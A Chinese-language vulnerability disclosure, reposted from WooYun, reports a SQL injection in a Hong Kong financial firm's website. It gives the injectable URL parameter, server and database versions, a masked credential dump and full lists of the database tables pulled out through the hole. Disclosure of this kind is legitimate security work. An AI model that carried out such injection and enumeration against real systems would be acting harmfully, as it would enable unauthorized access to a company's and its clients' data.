神刀安全网

漏洞标题: 信達國際控股有限公司SQL注射漏洞(香港地區)

漏洞详情

披露状态:

2016-03-22: 细节已通知厂商并且等待厂商处理中
2016-03-24: 厂商已经确认,细节仅向厂商公开
2016-03-31: 厂商已经修复漏洞并主动公开,细节向公众公开

简要描述:

信達國際控股有限公司(「信達國際」,香港交易所股份代號 : 111)為一家金融服務機構,由中國信達資產管理股份有限公司(「中國信達」)透過全資附屬公司中國信達(香港)控股有限公司控股。

详细说明:

code 区域
Target: http://**.**.**.**/e/include/_dj_details.php?uniqueid=20100910DN002423
Host IP: **.**.**.**
Web Server: Apache/2.2.15 (CentOS)
Powered-by: PHP/5.3.3
DB Server: MySQL >=5
Resp. Time(avg): 141 ms
Current User: cinda@**.**.**.**
Sql Version: 5.1.71
Current DB: cinda
System User: cinda@**.**.**.**
Host Name: CMS.cinda.local
Installation dir: /usr/
DB User & Pass:

mask 区域
*****ocal*****
*****.cinda*****
******.**.*****
*****alho*****
*****inda.*****
*****DD***CEFB*****
******CEFB7BB94D*****
*****EFB7BB94DDD3*****
*****formatio*****
*****in*****
*****dau*****
*****ys*****
*****es*****

漏洞证明:

code 区域

mask 区域
*****sk*****

Count(table_name) of information_schema.tables where table_schema=0x63696E6461 is 46
Tables found: analysis_record,client_info,client_info_last,cms_content,cms_content_bk,cms_content_check,cms_content_last,cms_index,cms_info,cmsgroup_info,dowjones_news,dowjones_news_1085,dowjones_news_20100822,dowjones_news_20100909,dowjones_news_CH,dowjones_news_DJCS,dowjones_news_FRX,dowjones_news_FXC,dowjones_news_FXU,dowjones_news_FXW,dowjones_news_HK,dowjones_news_MON,dowjones_news_STK,dowjones_news_b20090531,dowjones_news_backup,form_record,function1,function2,function3,function4,function5,lang_info,mod1,mod1_info,mod1_info_last,mod2_info,mod2_info_last,mod7_info,mod_index,pageview,pref_setting,right_info,theme_info,user_info,user_info_last,user_log
Count(table_name) of information_schema.tables where table_schema=0x63696E6461756174 is 31
Tables found: analysis_record,client_info,client_info_last,cms_content,cms_content_check,cms_content_last,cms_index,cms_info,cmsgroup_info,form_record,function1,function2,function3,function4,function5,lang_info,mod1,mod1_info,mod1_info_last,mod2_info,mod2_info_last,mod7_info,mod_index,pageview,pageview_cms,pref_setting,right_info,theme_info,user_info,user_info_last,user_log
</mask>

修复方案:

版权声明:转载请注明来源 蝶.!@乌云

转载本站任何文章请注明:转载至神刀安全网,谢谢神刀安全网 » 漏洞标题: 信達國際控股有限公司SQL注射漏洞(香港地區)

分享到:更多 ()

评论 抢沙发

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址